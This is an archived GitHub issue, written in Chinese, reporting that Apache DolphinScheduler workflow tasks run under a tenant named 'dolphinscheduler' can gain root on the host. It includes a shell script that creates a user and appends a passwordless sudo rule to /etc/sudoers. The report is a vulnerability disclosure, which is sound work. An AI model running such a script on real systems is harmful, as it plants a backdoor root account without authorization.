[GitHub] [incubator-dolphinscheduler] zqWu opened a new issue #3998: 通过dolphinescheduler获取主机的root权限

GitBox Mon, 26 Oct 2020 20:26:02 -0700


zqWu opened a new issue #3998:
URL: https://github.com/apache/incubator-dolphinscheduler/issues/3998



   不知道这个是否属于bug。
   
   (1) dolphinschduler安装的机器上有 linux账号 dolphinscheduler，这个账号是sudoer，且免密
   (2) 任务执行时，执行者是 安全中心下的某个租户，当这个租户=dolphinscheduler时，就可以执行几乎所有操作
   
   重现bug:
   (1) 安全中心，建租户 dolphinscheduler
   (2) 工作流，shell 脚本
   `#!/bin/bash
   
   # 当前主机ip
   ip addr | grep 'inet '
   
   # i am dolphinscheduler
   whoami
   sudo useradd dormi
   echo "dormi" | sudo passwd --stdin dormi
   
   sudo chmod 660 /etc/sudoers
   sudo sed -i '$adormi  ALL=(ALL)  NOPASSWD: NOPASSWD: ALL' /etc/sudoers
   sudo chmod 440 /etc/sudoers
   `
   然后选择租户  dolphinscheduler
   
   如果运行没问题，就可以在该主机上有 dormi账户了。sudo -i就是root
   


----------------------------------------------------------------
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

For queries about this service, please contact Infrastructure at:
[email protected]

[GitHub] [incubator-dolphinscheduler] zqWu opened a new issue #3998: 通过dolphinescheduler获取主机的root权限

Reply via email to